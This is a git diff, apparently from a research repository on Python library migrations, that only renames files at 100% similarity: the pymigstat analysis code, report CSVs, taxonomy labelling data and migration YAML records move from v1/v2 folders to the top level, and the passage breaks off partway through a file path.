diff --git a/v2/code/.gitignore b/code/.gitignore similarity index 100% rename from v2/code/.gitignore rename to code/.gitignore diff --git a/v2/code/LICENSE b/code/LICENSE similarity index 100% rename from v2/code/LICENSE rename to code/LICENSE diff --git a/v2/code/configs/config.yaml b/code/configs/config.yaml similarity index 100% rename from v2/code/configs/config.yaml rename to code/configs/config.yaml diff --git a/v1/code/core/__init__.py b/code/pymigstat/__init__.py similarity index 100% rename from v1/code/core/__init__.py rename to code/pymigstat/__init__.py diff --git a/v1/code/query/__init__.py b/code/pymigstat/code_change_search/__init__.py similarity index 100% rename from v1/code/query/__init__.py rename to code/pymigstat/code_change_search/__init__.py diff --git a/v2/code/pymigstat/code_change_search/diff_meta_parser.py b/code/pymigstat/code_change_search/diff_meta_parser.py similarity index 100% rename from v2/code/pymigstat/code_change_search/diff_meta_parser.py rename to code/pymigstat/code_change_search/diff_meta_parser.py diff --git a/v2/code/pymigstat/code_change_search/find_code_changes.py b/code/pymigstat/code_change_search/find_code_changes.py similarity index 100% rename from v2/code/pymigstat/code_change_search/find_code_changes.py rename to code/pymigstat/code_change_search/find_code_changes.py diff --git a/v2/code/pymigstat/code_change_search/usage_resolver.py b/code/pymigstat/code_change_search/usage_resolver.py similarity index 100% rename from v2/code/pymigstat/code_change_search/usage_resolver.py rename to code/pymigstat/code_change_search/usage_resolver.py diff --git a/v2/code/pymigstat/complexity/__init__.py b/code/pymigstat/complexity/__init__.py similarity index 100% rename from v2/code/pymigstat/complexity/__init__.py rename to code/pymigstat/complexity/__init__.py diff --git a/v2/code/pymigstat/complexity/max_cardinality.py b/code/pymigstat/complexity/max_cardinality.py similarity index 100% rename from v2/code/pymigstat/complexity/max_cardinality.py rename to code/pymigstat/complexity/max_cardinality.py diff --git a/v2/code/pymigstat/complexity/mfiles_migration_complexity.py b/code/pymigstat/complexity/mfiles_migration_complexity.py similarity index 100% rename from v2/code/pymigstat/complexity/mfiles_migration_complexity.py rename to code/pymigstat/complexity/mfiles_migration_complexity.py diff --git a/v2/code/pymigstat/complexity/mig_loc.py b/code/pymigstat/complexity/mig_loc.py similarity
index 100% rename from v2/code/pymigstat/complexity/mig_loc.py rename to code/pymigstat/complexity/mig_loc.py diff --git a/v2/code/pymigstat/complexity/migration_metric.py b/code/pymigstat/complexity/migration_metric.py similarity index 100% rename from v2/code/pymigstat/complexity/migration_metric.py rename to code/pymigstat/complexity/migration_metric.py diff --git a/v2/code/pymigstat/complexity/num_apis.py b/code/pymigstat/complexity/num_apis.py similarity index 100% rename from v2/code/pymigstat/complexity/num_apis.py rename to code/pymigstat/complexity/num_apis.py diff --git a/v2/code/pymigstat/complexity/num_changes.py b/code/pymigstat/complexity/num_changes.py similarity index 100% rename from v2/code/pymigstat/complexity/num_changes.py rename to code/pymigstat/complexity/num_changes.py diff --git a/v2/code/pymigstat/complexity/pe_set.py b/code/pymigstat/complexity/pe_set.py similarity index 100% rename from v2/code/pymigstat/complexity/pe_set.py rename to code/pymigstat/complexity/pe_set.py diff --git a/v2/code/pymigstat/complexity/prop_set.py b/code/pymigstat/complexity/prop_set.py similarity index 100% rename from v2/code/pymigstat/complexity/prop_set.py rename to code/pymigstat/complexity/prop_set.py diff --git a/v2/code/pymigstat/complexity/unique_apis.py b/code/pymigstat/complexity/unique_apis.py similarity index 100% rename from v2/code/pymigstat/complexity/unique_apis.py rename to code/pymigstat/complexity/unique_apis.py diff --git a/v2/code/pymigstat/complexity/unique_mappings.py b/code/pymigstat/complexity/unique_mappings.py similarity index 100% rename from v2/code/pymigstat/complexity/unique_mappings.py rename to code/pymigstat/complexity/unique_mappings.py diff --git a/v2/code/pymigstat/config.py b/code/pymigstat/config.py similarity index 100% rename from v2/code/pymigstat/config.py rename to code/pymigstat/config.py diff --git a/v2/code/pymigstat/__init__.py b/code/pymigstat/core/__init__.py similarity index 100% rename from v2/code/pymigstat/__init__.py rename to code/pymigstat/core/__init__.py diff --git a/v2/code/pymigstat/core/import_statement_finder.py b/code/pymigstat/core/import_statement_finder.py similarity index 100% rename from v2/code/pymigstat/core/import_statement_finder.py rename to code/pymigstat/core/import_statement_finder.py diff --git a/v2/code/pymigstat/core/pypi_cache.py b/code/pymigstat/core/pypi_cache.py similarity index 100% rename from v2/code/pymigstat/core/pypi_cache.py rename to code/pymigstat/core/pypi_cache.py diff --git a/v2/code/pymigstat/csv_helper.py b/code/pymigstat/csv_helper.py similarity index 100% rename from v2/code/pymigstat/csv_helper.py rename to code/pymigstat/csv_helper.py diff --git a/v2/code/pymigstat/code_change_search/__init__.py b/code/pymigstat/datamodels/__init__.py similarity index 100% rename from v2/code/pymigstat/code_change_search/__init__.py rename to code/pymigstat/datamodels/__init__.py diff --git a/v2/code/pymigstat/datamodels/api_mapping.py b/code/pymigstat/datamodels/api_mapping.py similarity index 100% rename from v2/code/pymigstat/datamodels/api_mapping.py rename to code/pymigstat/datamodels/api_mapping.py diff --git a/v2/code/pymigstat/datamodels/data_reader.py b/code/pymigstat/datamodels/data_reader.py similarity index 100% rename from v2/code/pymigstat/datamodels/data_reader.py rename to code/pymigstat/datamodels/data_reader.py diff --git a/v2/code/pymigstat/datamodels/datamodel.py b/code/pymigstat/datamodels/datamodel.py similarity index 100% rename from v2/code/pymigstat/datamodels/datamodel.py 
rename to code/pymigstat/datamodels/datamodel.py diff --git a/v2/code/pymigstat/datamodels/loaders.py b/code/pymigstat/datamodels/loaders.py similarity index 100% rename from v2/code/pymigstat/datamodels/loaders.py rename to code/pymigstat/datamodels/loaders.py diff --git a/v2/code/pymigstat/datamodels/migration.py b/code/pymigstat/datamodels/migration.py similarity index 100% rename from v2/code/pymigstat/datamodels/migration.py rename to code/pymigstat/datamodels/migration.py diff --git a/v2/code/pymigstat/datamodels/storage.py b/code/pymigstat/datamodels/storage.py similarity index 100% rename from v2/code/pymigstat/datamodels/storage.py rename to code/pymigstat/datamodels/storage.py diff --git a/v2/code/pymigstat/core/__init__.py b/code/pymigstat/latex/__init__.py similarity index 100% rename from v2/code/pymigstat/core/__init__.py rename to code/pymigstat/latex/__init__.py diff --git a/v2/code/pymigstat/latex/core.py b/code/pymigstat/latex/core.py similarity index 100% rename from v2/code/pymigstat/latex/core.py rename to code/pymigstat/latex/core.py diff --git a/v2/code/pymigstat/latex/graphics.py b/code/pymigstat/latex/graphics.py similarity index 100% rename from v2/code/pymigstat/latex/graphics.py rename to code/pymigstat/latex/graphics.py diff --git a/v2/code/pymigstat/latex/tables.py b/code/pymigstat/latex/tables.py similarity index 100% rename from v2/code/pymigstat/latex/tables.py rename to code/pymigstat/latex/tables.py diff --git a/v2/code/pymigstat/latex/utils.py b/code/pymigstat/latex/utils.py similarity index 100% rename from v2/code/pymigstat/latex/utils.py rename to code/pymigstat/latex/utils.py diff --git a/v2/code/pymigstat/pymigstat.py b/code/pymigstat/pymigstat.py similarity index 100% rename from v2/code/pymigstat/pymigstat.py rename to code/pymigstat/pymigstat.py diff --git a/v2/code/pymigstat/reports/__init__.py b/code/pymigstat/reports/__init__.py similarity index 100% rename from v2/code/pymigstat/reports/__init__.py rename to code/pymigstat/reports/__init__.py diff --git a/v2/code/pymigstat/reports/api_mapping_data.py b/code/pymigstat/reports/api_mapping_data.py similarity index 100% rename from v2/code/pymigstat/reports/api_mapping_data.py rename to code/pymigstat/reports/api_mapping_data.py diff --git a/v2/code/pymigstat/reports/api_mapping_stats.py b/code/pymigstat/reports/api_mapping_stats.py similarity index 100% rename from v2/code/pymigstat/reports/api_mapping_stats.py rename to code/pymigstat/reports/api_mapping_stats.py diff --git a/v2/code/pymigstat/reports/big_combination_stats.py b/code/pymigstat/reports/big_combination_stats.py similarity index 100% rename from v2/code/pymigstat/reports/big_combination_stats.py rename to code/pymigstat/reports/big_combination_stats.py diff --git a/v2/code/pymigstat/reports/cardinality_stat.py b/code/pymigstat/reports/cardinality_stat.py similarity index 100% rename from v2/code/pymigstat/reports/cardinality_stat.py rename to code/pymigstat/reports/cardinality_stat.py diff --git a/v2/code/pymigstat/reports/code_change_summary.py b/code/pymigstat/reports/code_change_summary.py similarity index 100% rename from v2/code/pymigstat/reports/code_change_summary.py rename to code/pymigstat/reports/code_change_summary.py diff --git a/v2/code/pymigstat/reports/data_stats.py b/code/pymigstat/reports/data_stats.py similarity index 100% rename from v2/code/pymigstat/reports/data_stats.py rename to code/pymigstat/reports/data_stats.py diff --git a/v2/code/pymigstat/reports/export_constant_data.py 
b/code/pymigstat/reports/export_constant_data.py similarity index 100% rename from v2/code/pymigstat/reports/export_constant_data.py rename to code/pymigstat/reports/export_constant_data.py diff --git a/v2/code/pymigstat/reports/lib_pair_data.py b/code/pymigstat/reports/lib_pair_data.py similarity index 100% rename from v2/code/pymigstat/reports/lib_pair_data.py rename to code/pymigstat/reports/lib_pair_data.py diff --git a/v2/code/pymigstat/reports/lib_pair_stats.py b/code/pymigstat/reports/lib_pair_stats.py similarity index 100% rename from v2/code/pymigstat/reports/lib_pair_stats.py rename to code/pymigstat/reports/lib_pair_stats.py diff --git a/v2/code/pymigstat/reports/mig_effort_stats.py b/code/pymigstat/reports/mig_effort_stats.py similarity index 100% rename from v2/code/pymigstat/reports/mig_effort_stats.py rename to code/pymigstat/reports/mig_effort_stats.py diff --git a/v2/code/pymigstat/reports/migration_summary.py b/code/pymigstat/reports/migration_summary.py similarity index 100% rename from v2/code/pymigstat/reports/migration_summary.py rename to code/pymigstat/reports/migration_summary.py diff --git a/v2/code/pymigstat/reports/misc.py b/code/pymigstat/reports/misc.py similarity index 100% rename from v2/code/pymigstat/reports/misc.py rename to code/pymigstat/reports/misc.py diff --git a/v2/code/pymigstat/reports/signature_change_stat.py b/code/pymigstat/reports/signature_change_stat.py similarity index 100% rename from v2/code/pymigstat/reports/signature_change_stat.py rename to code/pymigstat/reports/signature_change_stat.py diff --git a/v2/code/pymigstat/reports/update_report_data.py b/code/pymigstat/reports/update_report_data.py similarity index 100% rename from v2/code/pymigstat/reports/update_report_data.py rename to code/pymigstat/reports/update_report_data.py diff --git a/v2/code/pymigstat/datamodels/__init__.py b/code/pymigstat/runnables/__init__.py similarity index 100% rename from v2/code/pymigstat/datamodels/__init__.py rename to code/pymigstat/runnables/__init__.py diff --git a/v2/code/pymigstat/runnables/clean_up_data_files.py b/code/pymigstat/runnables/clean_up_data_files.py similarity index 100% rename from v2/code/pymigstat/runnables/clean_up_data_files.py rename to code/pymigstat/runnables/clean_up_data_files.py diff --git a/v2/code/pymigstat/runnables/convert_pymigbench_data.py b/code/pymigstat/runnables/convert_pymigbench_data.py similarity index 100% rename from v2/code/pymigstat/runnables/convert_pymigbench_data.py rename to code/pymigstat/runnables/convert_pymigbench_data.py diff --git a/v2/code/pymigstat/runnables/download_repos.py b/code/pymigstat/runnables/download_repos.py similarity index 100% rename from v2/code/pymigstat/runnables/download_repos.py rename to code/pymigstat/runnables/download_repos.py diff --git a/v2/code/pymigstat/runnables/filter_migration_data.py b/code/pymigstat/runnables/filter_migration_data.py similarity index 100% rename from v2/code/pymigstat/runnables/filter_migration_data.py rename to code/pymigstat/runnables/filter_migration_data.py diff --git a/v2/code/pymigstat/runnables/find_all_code_changes.py b/code/pymigstat/runnables/find_all_code_changes.py similarity index 100% rename from v2/code/pymigstat/runnables/find_all_code_changes.py rename to code/pymigstat/runnables/find_all_code_changes.py diff --git a/v2/code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py b/code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py similarity index 100% rename from 
v2/code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py rename to code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py diff --git a/v2/code/pymigstat/latex/__init__.py b/code/pymigstat/taxonomy/__init__.py similarity index 100% rename from v2/code/pymigstat/latex/__init__.py rename to code/pymigstat/taxonomy/__init__.py diff --git a/v2/code/pymigstat/taxonomy/agreement_rate.py b/code/pymigstat/taxonomy/agreement_rate.py similarity index 100% rename from v2/code/pymigstat/taxonomy/agreement_rate.py rename to code/pymigstat/taxonomy/agreement_rate.py diff --git a/v2/code/pymigstat/taxonomy/agreement_rate_round_1.py b/code/pymigstat/taxonomy/agreement_rate_round_1.py similarity index 100% rename from v2/code/pymigstat/taxonomy/agreement_rate_round_1.py rename to code/pymigstat/taxonomy/agreement_rate_round_1.py diff --git a/v2/code/pymigstat/taxonomy/combine_rounds.py b/code/pymigstat/taxonomy/combine_rounds.py similarity index 100% rename from v2/code/pymigstat/taxonomy/combine_rounds.py rename to code/pymigstat/taxonomy/combine_rounds.py diff --git a/v2/code/pymigstat/taxonomy/constants.py b/code/pymigstat/taxonomy/constants.py similarity index 100% rename from v2/code/pymigstat/taxonomy/constants.py rename to code/pymigstat/taxonomy/constants.py diff --git a/v2/code/pymigstat/taxonomy/export_yaml.py b/code/pymigstat/taxonomy/export_yaml.py similarity index 100% rename from v2/code/pymigstat/taxonomy/export_yaml.py rename to code/pymigstat/taxonomy/export_yaml.py diff --git a/v2/code/pymigstat/taxonomy/generate_taxonomy.py b/code/pymigstat/taxonomy/generate_taxonomy.py similarity index 100% rename from v2/code/pymigstat/taxonomy/generate_taxonomy.py rename to code/pymigstat/taxonomy/generate_taxonomy.py diff --git a/v2/code/pymigstat/taxonomy/merge_labellings.py b/code/pymigstat/taxonomy/merge_labellings.py similarity index 100% rename from v2/code/pymigstat/taxonomy/merge_labellings.py rename to code/pymigstat/taxonomy/merge_labellings.py diff --git a/v2/code/pymigstat/taxonomy/merge_labellings_round_1.py b/code/pymigstat/taxonomy/merge_labellings_round_1.py similarity index 100% rename from v2/code/pymigstat/taxonomy/merge_labellings_round_1.py rename to code/pymigstat/taxonomy/merge_labellings_round_1.py diff --git a/v2/code/pymigstat/tools/__init__.py b/code/pymigstat/tools/__init__.py similarity index 100% rename from v2/code/pymigstat/tools/__init__.py rename to code/pymigstat/tools/__init__.py diff --git a/v2/code/pymigstat/tools/external_tool.py b/code/pymigstat/tools/external_tool.py similarity index 100% rename from v2/code/pymigstat/tools/external_tool.py rename to code/pymigstat/tools/external_tool.py diff --git a/v2/code/pymigstat/tools/git_repo_wrapper.py b/code/pymigstat/tools/git_repo_wrapper.py similarity index 100% rename from v2/code/pymigstat/tools/git_repo_wrapper.py rename to code/pymigstat/tools/git_repo_wrapper.py diff --git a/v2/code/pymigstat/utils/__init__.py b/code/pymigstat/utils/__init__.py similarity index 100% rename from v2/code/pymigstat/utils/__init__.py rename to code/pymigstat/utils/__init__.py diff --git a/v2/code/pymigstat/utils/gpt_client.py b/code/pymigstat/utils/gpt_client.py similarity index 100% rename from v2/code/pymigstat/utils/gpt_client.py rename to code/pymigstat/utils/gpt_client.py diff --git a/v2/code/pymigstat/utils/progress.py b/code/pymigstat/utils/progress.py similarity index 100% rename from v2/code/pymigstat/utils/progress.py rename to code/pymigstat/utils/progress.py diff --git 
a/v2/code/pymigstat/utils/utils.py b/code/pymigstat/utils/utils.py similarity index 100% rename from v2/code/pymigstat/utils/utils.py rename to code/pymigstat/utils/utils.py diff --git a/v2/code/report/code-changes.csv b/code/report/code-changes.csv similarity index 100% rename from v2/code/report/code-changes.csv rename to code/report/code-changes.csv diff --git a/v2/code/report/combined-ccs-raw.csv b/code/report/combined-ccs-raw.csv similarity index 100% rename from v2/code/report/combined-ccs-raw.csv rename to code/report/combined-ccs-raw.csv diff --git a/v2/code/report/data-stats.csv b/code/report/data-stats.csv similarity index 100% rename from v2/code/report/data-stats.csv rename to code/report/data-stats.csv diff --git a/v2/code/report/effort.csv b/code/report/effort.csv similarity index 100% rename from v2/code/report/effort.csv rename to code/report/effort.csv diff --git a/v2/code/report/migration-combination--with-fc-groups.csv b/code/report/migration-combination--with-fc-groups.csv similarity index 100% rename from v2/code/report/migration-combination--with-fc-groups.csv rename to code/report/migration-combination--with-fc-groups.csv diff --git a/v2/code/report/migration-combination.csv b/code/report/migration-combination.csv similarity index 100% rename from v2/code/report/migration-combination.csv rename to code/report/migration-combination.csv diff --git a/v2/code/report/migrations.csv b/code/report/migrations.csv similarity index 100% rename from v2/code/report/migrations.csv rename to code/report/migrations.csv diff --git a/v2/code/report/taxonomy-stat-table.csv b/code/report/taxonomy-stat-table.csv similarity index 100% rename from v2/code/report/taxonomy-stat-table.csv rename to code/report/taxonomy-stat-table.csv diff --git a/v2/code/requirements.txt b/code/requirements.txt similarity index 100% rename from v2/code/requirements.txt rename to code/requirements.txt diff --git a/v2/code/taxonomy-data/round1--merge.csv b/code/taxonomy-data/round1--merge.csv similarity index 100% rename from v2/code/taxonomy-data/round1--merge.csv rename to code/taxonomy-data/round1--merge.csv diff --git a/v2/code/taxonomy-data/round1-ajay.csv b/code/taxonomy-data/round1-ajay.csv similarity index 100% rename from v2/code/taxonomy-data/round1-ajay.csv rename to code/taxonomy-data/round1-ajay.csv diff --git a/v2/code/taxonomy-data/round1-ildar.csv b/code/taxonomy-data/round1-ildar.csv similarity index 100% rename from v2/code/taxonomy-data/round1-ildar.csv rename to code/taxonomy-data/round1-ildar.csv diff --git a/v2/code/taxonomy-data/round1-moha.csv b/code/taxonomy-data/round1-moha.csv similarity index 100% rename from v2/code/taxonomy-data/round1-moha.csv rename to code/taxonomy-data/round1-moha.csv diff --git a/v2/code/taxonomy-data/round1-sarah.csv b/code/taxonomy-data/round1-sarah.csv similarity index 100% rename from v2/code/taxonomy-data/round1-sarah.csv rename to code/taxonomy-data/round1-sarah.csv diff --git a/v2/code/taxonomy-data/round2--merge.csv b/code/taxonomy-data/round2--merge.csv similarity index 100% rename from v2/code/taxonomy-data/round2--merge.csv rename to code/taxonomy-data/round2--merge.csv diff --git a/v2/code/taxonomy-data/round2-ajay.csv b/code/taxonomy-data/round2-ajay.csv similarity index 100% rename from v2/code/taxonomy-data/round2-ajay.csv rename to code/taxonomy-data/round2-ajay.csv diff --git a/v2/code/taxonomy-data/round2-ildar.csv b/code/taxonomy-data/round2-ildar.csv similarity index 100% rename from v2/code/taxonomy-data/round2-ildar.csv rename to 
code/taxonomy-data/round2-ildar.csv diff --git a/v2/code/taxonomy-data/round2-moha.csv b/code/taxonomy-data/round2-moha.csv similarity index 100% rename from v2/code/taxonomy-data/round2-moha.csv rename to code/taxonomy-data/round2-moha.csv diff --git a/v2/code/taxonomy-data/round2-sarah.csv b/code/taxonomy-data/round2-sarah.csv similarity index 100% rename from v2/code/taxonomy-data/round2-sarah.csv rename to code/taxonomy-data/round2-sarah.csv diff --git a/v2/code/taxonomy-data/round3--merge.csv b/code/taxonomy-data/round3--merge.csv similarity index 100% rename from v2/code/taxonomy-data/round3--merge.csv rename to code/taxonomy-data/round3--merge.csv diff --git a/v2/code/taxonomy-data/round3-ajay.csv b/code/taxonomy-data/round3-ajay.csv similarity index 100% rename from v2/code/taxonomy-data/round3-ajay.csv rename to code/taxonomy-data/round3-ajay.csv diff --git a/v2/code/taxonomy-data/round3-ildar.csv b/code/taxonomy-data/round3-ildar.csv similarity index 100% rename from v2/code/taxonomy-data/round3-ildar.csv rename to code/taxonomy-data/round3-ildar.csv diff --git a/v2/code/taxonomy-data/round3-moha.csv b/code/taxonomy-data/round3-moha.csv similarity index 100% rename from v2/code/taxonomy-data/round3-moha.csv rename to code/taxonomy-data/round3-moha.csv diff --git a/v2/code/taxonomy-data/round3-sarah.csv b/code/taxonomy-data/round3-sarah.csv similarity index 100% rename from v2/code/taxonomy-data/round3-sarah.csv rename to code/taxonomy-data/round3-sarah.csv diff --git a/v2/data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml b/data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml similarity index 100% rename from v2/data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml rename to data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml diff --git a/v2/data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml b/data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml similarity index 100% rename from v2/data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml rename to data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml diff --git a/v2/data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml b/data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml similarity index 100% rename from v2/data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml rename to data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml diff --git a/v2/data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml b/data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml similarity index 100% rename from v2/data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml rename to data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml diff --git a/v2/data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml b/data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml similarity index 100% rename from v2/data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml rename to data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml diff --git a/v2/data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml b/data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml similarity index 100% rename from v2/data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml rename to data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml diff --git 
a/v2/data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml b/data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml similarity index 100% rename from v2/data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml rename to data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml diff --git a/v2/data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml b/data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml similarity index 100% rename from v2/data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml rename to data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml diff --git a/v2/data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml b/data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml similarity index 100% rename from v2/data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml rename to data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml diff --git a/v2/data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml b/data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml similarity index 100% rename from v2/data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml rename to data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml diff --git a/v2/data/migration/argparse__click__grahame@sedge__3badf07.yaml b/data/migration/argparse__click__grahame@sedge__3badf07.yaml similarity index 100% rename from v2/data/migration/argparse__click__grahame@sedge__3badf07.yaml rename to data/migration/argparse__click__grahame@sedge__3badf07.yaml diff --git a/v2/data/migration/argparse__click__himkt@pyner__76106a9.yaml b/data/migration/argparse__click__himkt@pyner__76106a9.yaml similarity index 100% rename from v2/data/migration/argparse__click__himkt@pyner__76106a9.yaml rename to data/migration/argparse__click__himkt@pyner__76106a9.yaml diff --git a/v2/data/migration/argparse__click__klensy@wt-tools__760ff36.yaml b/data/migration/argparse__click__klensy@wt-tools__760ff36.yaml similarity index 100% rename from v2/data/migration/argparse__click__klensy@wt-tools__760ff36.yaml rename to data/migration/argparse__click__klensy@wt-tools__760ff36.yaml diff --git a/v2/data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml b/data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml similarity index 100% rename from v2/data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml rename to data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml diff --git a/v2/data/migration/argparse__click__lqez@hog__d722ade.yaml b/data/migration/argparse__click__lqez@hog__d722ade.yaml similarity index 100% rename from v2/data/migration/argparse__click__lqez@hog__d722ade.yaml rename to data/migration/argparse__click__lqez@hog__d722ade.yaml diff --git a/v2/data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml b/data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml similarity index 100% rename from v2/data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml rename to data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml diff --git a/v2/data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml b/data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml similarity index 100% rename from v2/data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml rename to data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml diff --git 
a/v2/data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml b/data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml similarity index 100% rename from v2/data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml rename to data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml diff --git a/v2/data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml b/data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml similarity index 100% rename from v2/data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml rename to data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml diff --git a/v2/data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml b/data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml similarity index 100% rename from v2/data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml rename to data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml diff --git a/v2/data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml b/data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml similarity index 100% rename from v2/data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml rename to data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml diff --git a/v2/data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml b/data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml similarity index 100% rename from v2/data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml rename to data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml diff --git a/v2/data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml b/data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml similarity index 100% rename from v2/data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml rename to data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml diff --git a/v2/data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml b/data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml similarity index 100% rename from v2/data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml rename to data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml diff --git a/v2/data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml b/data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml similarity index 100% rename from v2/data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml rename to data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml diff --git a/v2/data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml b/data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml similarity index 100% rename from v2/data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml rename to data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml diff --git a/v2/data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml b/data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml rename to data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml diff --git a/v2/data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml b/data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml 
similarity index 100% rename from v2/data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml rename to data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml diff --git a/v2/data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml b/data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml rename to data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml diff --git a/v2/data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml b/data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml rename to data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml diff --git a/v2/data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml b/data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml similarity index 100% rename from v2/data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml rename to data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml diff --git a/v2/data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml b/data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml similarity index 100% rename from v2/data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml rename to data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml diff --git a/v2/data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml b/data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml similarity index 100% rename from v2/data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml rename to 